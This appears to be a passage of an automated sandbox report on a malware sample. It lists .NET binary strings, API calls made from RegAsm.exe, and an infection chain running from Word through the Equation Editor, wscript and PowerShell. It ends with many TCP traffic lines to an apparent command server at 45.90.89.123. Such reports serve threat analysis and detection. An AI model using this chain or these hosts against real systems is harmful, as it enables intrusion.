                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global traffic DNS query: name: ia601706.us.archive.org
                Source: global traffic DNS query: name: geoplugin.net
                Source: global traffic TCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 45.90.89.123:80
                Source: global traffic TCP traffic: 192.168.2.22:49165 -> 178.237.33.50:80
                Source: global traffic TCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
